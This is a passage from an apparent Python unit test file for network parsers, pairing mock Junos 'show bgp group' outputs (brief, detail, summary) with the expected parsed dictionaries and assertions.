Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 3 Established: 0
10.189.5.245+179
10.189.5.243+179
10.189.5.242+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_TRIANGLE Index: 3 Flags: <Export Eval>
Export: [ (ALL_out && v6_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::7+179
2001:db8:223c:ca45::8
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_SQUARE Index: 4 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::9
2001:db8:223c:ca45::a
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_SQUARE Index: 5 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
10.189.5.241+179
10.189.5.240
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_Kentik Index: 6 Flags: <Export Eval>
Export: [ v4_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.49.216.179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Kentik Index: 7 Flags: <Export Eval>
Export: [ v6_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:6be:89bb::1:140
Group Type: External Local AS: 65171
Name: sggjbb001 Index: 8 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.189.6.250
Group Type: External Local AS: 65171
Name: v6_sggjbb001 Index: 9 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:5961:ca45::1
Group Type: External Local AS: 65171
Name: sjkGCS001-EC11 Index: 10 Flags: <Export Eval>
Export: [ ((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.169.14.240+60606
inet.0: 682/684/684/0
inet.3: 2/2/2/0
Group Type: External Local AS: 65171
Name: v6_sjkGCS001-EC11 Index: 11 Flags: <Export Eval>
Export: [ (v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:eb18:ca45::1+179
inet6.0: 0/0/0/0
Group Type: External Local AS: 65171
Name: obpGCS001-WC11 Index: 12 Flags: <Export Eval>
Export: [ (HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.169.14.249
Group Type: External Local AS: 65171
Name: v6_obpGCS001-WC11 Index: 13 Flags: <Export Eval>
Export: [ (v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:eb18:ca45::11
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
Table Tot Paths Act Paths Suppressed History Damp State Pending
inet.0
1366 682 0 0 0 0
inet.3
2 2 0 0 0 0
inet6.0
0 0 0 0 0 0
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v4_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "682"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "0",
"local-as": "65171",
"name": "Genie",
"peer-address": [
"10.189.5.253+179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "1",
"local-as": "65171",
"name": "v6_Genie",
"peer-address": [
"2001:db8:223c:ca45::c+60268"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v4_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "2",
"local-as": "65171",
"name": "v4_RRC_72_TRIANGLE",
"peer-address": [
"10.189.5.245+179",
"10.189.5.243+179",
"10.189.5.242+179"
],
"peer-as": "65171",
"peer-count": "3",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v6_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "3",
"local-as": "65171",
"name": "v6_RRC_72_TRIANGLE",
"peer-address": [
"2001:db8:223c:ca45::7+179",
"2001:db8:223c:ca45::8"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "4",
"local-as": "65171",
"name": "v6_RRC_72_SQUARE",
"peer-address": [
"2001:db8:223c:ca45::9",
"2001:db8:223c:ca45::a"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "5",
"local-as": "65171",
"name": "v4_RRC_72_SQUARE",
"peer-address": [
"10.189.5.241+179",
"10.189.5.240"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v4_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "6",
"local-as": "65171",
"name": "v4_Kentik",
"peer-address": [
"10.49.216.179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v6_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "7",
"local-as": "65171",
"name": "v6_Kentik",
"peer-address": [
"2001:db8:6be:89bb::1:140"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "8",
"local-as": "65171",
"name": "sggjbb001",
"peer-address": [
"10.189.6.250"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "9",
"local-as": "65171",
"name": "v6_sggjbb001",
"peer-address": [
"2001:db8:5961:ca45::1"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684"
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "10",
"local-as": "65171",
"name": "sjkGCS001-EC11",
"peer-address": [
"10.169.14.240+60606"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "11",
"local-as": "65171",
"name": "v6_sjkGCS001-EC11",
"peer-address": [
"2001:db8:eb18:ca45::1+179"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "12",
"local-as": "65171",
"name": "obpGCS001-WC11",
"peer-address": [
"10.169.14.249"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "13",
"local-as": "65171",
"name": "v6_obpGCS001-WC11",
"peer-address": [
"2001:db8:eb18:ca45::11"
],
"peer-count": "1",
"type": "External"
}
],
"bgp-information": {
"bgp-rib": [
{
"active-prefix-count": "682",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet.0",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "1366"
},
{
"active-prefix-count": "2",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet.3",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "2"
},
{
"active-prefix-count": "0",
"damped-prefix-count": "0",
"history-prefix-count": "0",
"name": "inet6.0",
"pending-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-prefix-count": "0"
}
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19"
}
}
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupBrief(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupBrief(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowBgpGroupDetail(unittest.TestCase):
""" Unit tests for:
* show bgp group detail | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
Group Type: Internal AS: 65171 Local AS: 65171
Name: Genie Index: 0 Flags: <Export Eval>
Export: [ (v4_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.189.5.253+179
Route Queue Timer: unset Route Queue: empty
Table inet.0
Active prefixes: 0
Received prefixes: 682
Accepted prefixes: 682
Suppressed due to damping: 0
Advertised prefixes: 682
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Genie Index: 1 Flags: <Export Eval>
Export: [ (v6_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:223c:ca45::c+60268
Route Queue Timer: unset Route Queue: empty
Table inet6.0
Active prefixes: 0
Received prefixes: 0
Accepted prefixes: 0
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_TRIANGLE Index: 2 Flags: <Export Eval>
Export: [ (ALL_out && v4_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 3 Established: 0
10.189.5.245
10.189.5.243
10.189.5.242+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_TRIANGLE Index: 3 Flags: <Export Eval>
Export: [ (ALL_out && v6_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::7+179
2001:db8:223c:ca45::8+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_RRC_72_SQUARE Index: 4 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
2001:db8:223c:ca45::9
2001:db8:223c:ca45::a+179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_SQUARE Index: 5 Flags: <Export Eval>
Export: [ ALL_out ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 2 Established: 0
10.189.5.241+179
10.189.5.240
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_Kentik Index: 6 Flags: <Export Eval>
Export: [ v4_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.49.216.179
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Kentik Index: 7 Flags: <Export Eval>
Export: [ v6_Kentik_NO-DEFAULT ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:6be:89bb::1:140
Group Type: External Local AS: 65171
Name: sggjbb001 Index: 8 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.189.6.250
Group Type: External Local AS: 65171
Name: v6_sggjbb001 Index: 9 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:5961:ca45::1
Group Type: External Local AS: 65171
Name: sjkGCS001-EC11 Index: 10 Flags: <Export Eval>
Export: [ ((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.169.14.240+60606
Route Queue Timer: unset Route Queue: empty
Table inet.0
Active prefixes: 682
Received prefixes: 684
Accepted prefixes: 684
Suppressed due to damping: 0
Advertised prefixes: 0
Table inet.3
Active prefixes: 2
Received prefixes: 2
Accepted prefixes: 2
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: External Local AS: 65171
Name: v6_sjkGCS001-EC11 Index: 11 Flags: <Export Eval>
Export: [ (v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:eb18:ca45::1+179
Route Queue Timer: unset Route Queue: empty
Table inet6.0
Active prefixes: 0
Received prefixes: 0
Accepted prefixes: 0
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: External Local AS: 65171
Name: obpGCS001-WC11 Index: 12 Flags: <Export Eval>
Export: [ (HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.169.14.249
Group Type: External Local AS: 65171
Name: v6_obpGCS001-WC11 Index: 13 Flags: <Export Eval>
Export: [ (v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:eb18:ca45::11
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
Table inet.0
Received prefixes: 1366
Accepted prefixes: 1366
Active prefixes: 682
Suppressed due to damping: 0
Received external prefixes: 684
Active external prefixes: 682
Externals suppressed: 0
Received internal prefixes: 682
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
Table inet.3
Received prefixes: 2
Accepted prefixes: 2
Active prefixes: 2
Suppressed due to damping: 0
Received external prefixes: 2
Active external prefixes: 2
Externals suppressed: 0
Received internal prefixes: 0
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
Table inet6.0
Received prefixes: 0
Accepted prefixes: 0
Active prefixes: 0
Suppressed due to damping: 0
Received external prefixes: 0
Active external prefixes: 0
Externals suppressed: 0
Received internal prefixes: 0
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v4_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "682",
"name": "inet.0",
"received-prefix-count": "682",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "0",
"local-as": "65171",
"name": "Genie",
"peer-address": [
"10.189.5.253+179"
],
"peer-as": "65171",
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "1",
"local-as": "65171",
"name": "v6_Genie",
"peer-address": [
"2001:db8:223c:ca45::c+60268"
],
"peer-as": "65171",
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v4_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "2",
"local-as": "65171",
"name": "v4_RRC_72_TRIANGLE",
"peer-address": [
"10.189.5.245",
"10.189.5.243",
"10.189.5.242+179"
],
"peer-as": "65171",
"peer-count": "3",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v6_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "3",
"local-as": "65171",
"name": "v6_RRC_72_TRIANGLE",
"peer-address": [
"2001:db8:223c:ca45::7+179",
"2001:db8:223c:ca45::8+179"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "4",
"local-as": "65171",
"name": "v6_RRC_72_SQUARE",
"peer-address": [
"2001:db8:223c:ca45::9",
"2001:db8:223c:ca45::a+179"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "5",
"local-as": "65171",
"name": "v4_RRC_72_SQUARE",
"peer-address": [
"10.189.5.241+179",
"10.189.5.240"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v4_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "6",
"local-as": "65171",
"name": "v4_Kentik",
"peer-address": [
"10.49.216.179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v6_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "7",
"local-as": "65171",
"name": "v6_Kentik",
"peer-address": [
"2001:db8:6be:89bb::1:140"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "8",
"local-as": "65171",
"name": "sggjbb001",
"peer-address": [
"10.189.6.250"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "9",
"local-as": "65171",
"name": "v6_sggjbb001",
"peer-address": [
"2001:db8:5961:ca45::1"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684",
"suppressed-prefix-count": "0"
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "10",
"local-as": "65171",
"name": "sjkGCS001-EC11",
"peer-address": [
"10.169.14.240+60606"
],
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "11",
"local-as": "65171",
"name": "v6_sjkGCS001-EC11",
"peer-address": [
"2001:db8:eb18:ca45::1+179"
],
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "12",
"local-as": "65171",
"name": "obpGCS001-WC11",
"peer-address": [
"10.169.14.249"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "13",
"local-as": "65171",
"name": "v6_obpGCS001-WC11",
"peer-address": [
"2001:db8:eb18:ca45::11"
],
"peer-count": "1",
"type": "External"
}
],
"bgp-information": {
"bgp-rib": [
{
"accepted-prefix-count": "1366",
"active-external-prefix-count": "682",
"active-internal-prefix-count": "0",
"active-prefix-count": "682",
"bgp-rib-state": "BGP restart is complete",
"name": "inet.0",
"received-prefix-count": "1366",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "684",
"total-internal-prefix-count": "682"
},
{
"accepted-prefix-count": "2",
"active-external-prefix-count": "2",
"active-internal-prefix-count": "0",
"active-prefix-count": "2",
"bgp-rib-state": "BGP restart is complete",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "2",
"total-internal-prefix-count": "0"
},
{
"accepted-prefix-count": "0",
"active-external-prefix-count": "0",
"active-internal-prefix-count": "0",
"active-prefix-count": "0",
"bgp-rib-state": "BGP restart is complete",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "0",
"total-internal-prefix-count": "0"
}
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19"
}
}
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupDetail(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowBgpGroupSummary(unittest.TestCase):
""" Unit tests for:
* show bgp group summary | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
# show bgp group summary | no-more
golden_output = {'execute.return_value': '''
Group Type Peers Established Active/Received/Accepted/Damped
hktGCS002 Internal 1 1
inet.0 : 0/682/682/0
v6_hktGCS002 Internal 1 1
inet6.0 : 0/0/0/0
v4_RRC_72_TRIANGLE Internal 3 0
v6_RRC_72_TRIANGLE Internal 2 0
v6_RRC_72_SQUARE Internal 2 0
v4_RRC_72_SQUARE Internal 2 0
v4_Kentik Internal 1 0
v6_Kentik Internal 1 0
